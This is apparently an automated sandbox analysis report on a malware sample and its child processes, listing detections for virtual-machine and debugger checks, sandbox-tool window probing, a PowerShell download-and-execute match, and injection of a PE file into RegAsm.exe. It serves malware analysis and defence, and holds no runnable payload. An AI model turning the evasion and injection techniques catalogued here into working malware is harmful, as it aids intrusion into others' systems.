                                    Source: Amcache.hve.54.drBinary or memory string: \driver\vmci,\driver\pci
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                    Source: Amcache.hve.54.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                    Source: Amcache.hve.54.drBinary or memory string: VMware20,1
                                    Source: Amcache.hve.54.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                    Source: Amcache.hve.54.drBinary or memory string: NECVMWar VMware SATA CD00
                                    Source: Amcache.hve.54.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                    Source: Amcache.hve.54.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                    Source: Amcache.hve.54.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                    Source: powershell.exe, 00000008.00000002.1319444757.00000287A8EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                    Source: Amcache.hve.54.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                    Source: Amcache.hve.54.drBinary or memory string: VMware PCI VMCI Bus Device
                                    Source: mshta.exe, 00000006.00000003.1183245797.00000148DA084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                                    Source: Amcache.hve.54.drBinary or memory string: VMware VMCI Bus Device
                                    Source: Amcache.hve.54.drBinary or memory string: VMware Virtual RAM
                                    Source: Amcache.hve.54.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000002.1267765693.0000000000513000.00000040.00000001.01000000.0000000E.sdmp, TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000002.1305129221.0000000000513000.00000040.00000001.01000000.0000000E.sdmp, rapes.exe, 0000000D.00000002.1315429749.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000D.00000001.1253268397.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000E.00000001.1255577601.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000E.00000002.3642183042.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000002.1699197808.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000001.1644798172.0000000000232000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000019.00000002.2294579206.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000001B.00000002.2895467212.0000000000233000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                    Source: Amcache.hve.54.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESystem information queried: ModuleInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Hides threads from debuggers
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: gbdyllo
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: procmon_window_class
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: NTICE
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SICE
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SIWVID
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXECode function: 11_2_04C40DE6 rdtsc 11_2_04C40DE6
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049EAA2 BlockInput,0_2_0049EAA2
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00452622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00452622
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004242DE
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00444CE8 mov eax, dword ptr fs:[00000030h]0_2_00444CE8
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_0005DB60 mov eax, dword ptr fs:[00000030h]14_2_0005DB60
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 14_2_00065FF2 mov eax, dword ptr fs:[00000030h]14_2_00065FF2
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00480B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00480B62
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00452622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00452622
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0044083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044083F
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004409D5 SetUnhandledExceptionFilter,0_2_004409D5
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00440C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00440C21
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeMemory allocated: page read and write | page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Yara detected Powershell download and execute
                                    Source: Yara matchFile source: amsi32_5708.amsi.csv, type: OTHER
                                    Source: Yara matchFile source: amsi64_5740.amsi.csv, type: OTHER
                                    Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5428, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 1992, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5740, type: MEMORYSTR
                                    Injects a PE file into a foreign processes
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000 value starts with: 4D5A
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeMemory written: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe base: 400000 value starts with: 4D5A
                                    Writes to foreign memory regions
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960064
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9600C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96012C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960190
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9601F4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960258
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9602BC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960320
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960384
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9603E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96044C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9604B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960514
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960578
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9605DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960640
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9606A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960708
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96076C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9607D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960834
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960898
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9608FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960960
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9609C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960A28
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960A8C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960AF0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960B54
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960BB8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960C1C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960C80
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960CE4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960D48
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960DAC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960E10
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960E74
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960ED8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960F3C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960FA0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961004
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961068
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9610CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961130
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961194
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9611F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96125C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9612C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961324
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961388
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9613EC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961450
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9614B4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961518
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96157C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9615E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961644
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9616A8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96170C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961770
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9617D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961838
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96189C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961900
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961964
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9619C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961A2C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961A90
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961AF4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961B58
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961BBC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961C20
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961C84
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961CE8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961D4C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961DB0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961E14
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961E78
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961EDC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961F40
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961FA4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962008
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96206C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9620D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962134
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962198
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9621FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962260
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9622C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962328
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96238C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9623F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962454
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9624B8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96251C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962580
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9625E4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962648
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9626AC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962710
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962774
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9627D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96283C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9628A0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962904
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962968
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9629CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962A30
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962A94
